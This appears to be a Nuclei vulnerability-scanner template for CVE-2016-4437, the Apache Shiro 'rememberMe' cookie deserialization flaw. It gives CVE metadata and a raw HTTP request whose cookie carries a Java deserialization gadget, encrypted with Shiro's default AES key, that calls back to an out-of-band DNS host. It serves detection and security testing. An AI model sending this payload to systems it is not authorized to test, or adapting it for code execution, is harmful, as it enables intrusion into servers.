Description
Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.
Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.
id: CVE-2016-4437
info:
name: Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.
impact: |
Remote code execution
remediation: |
Upgrade to a patched version of Apache Shiro
reference:
- https://github.com/Medicean/VulApps/tree/master/s/shiro/1
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4437
- http://packetstormsecurity.com/files/137310/Apache-Shiro-1.2.4-Information-Disclosure.html
- http://packetstormsecurity.com/files/157497/Apache-Shiro-1.2.4-Remote-Code-Execution.html
- http://rhn.redhat.com/errata/RHSA-2016-2035.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2016-4437
cwe-id: CWE-284
epss-score: 0.93039
epss-percentile: 0.99828
cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: shiro
tags: cve2016,cve,apache,rce,kev,packetstorm,shiro,deserialization,oast,vkev,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: rememberMe={{base64(concat(base64_decode("QUVTL0NCQy9QS0NTNVBhZA=="),aes_cbc(base64_decode(generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")), base64_decode("kPH+bIxk5D2deZiIxcaaaA=="), base64_decode("QUVTL0NCQy9QS0NTNVBhZA=="))))}}
matchers:
- type: word
part: interactsh_protocol
words:
- dns
# digest: 4b0a0048304602210091c949fd0ebf52c975bfd6204a24a2a65df51448aa07245c873bdfa9c5fd55b602210087ed484579cd20d1cc382d635a5440345ac07598e4f2d39635d5987b4b2d42e3:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.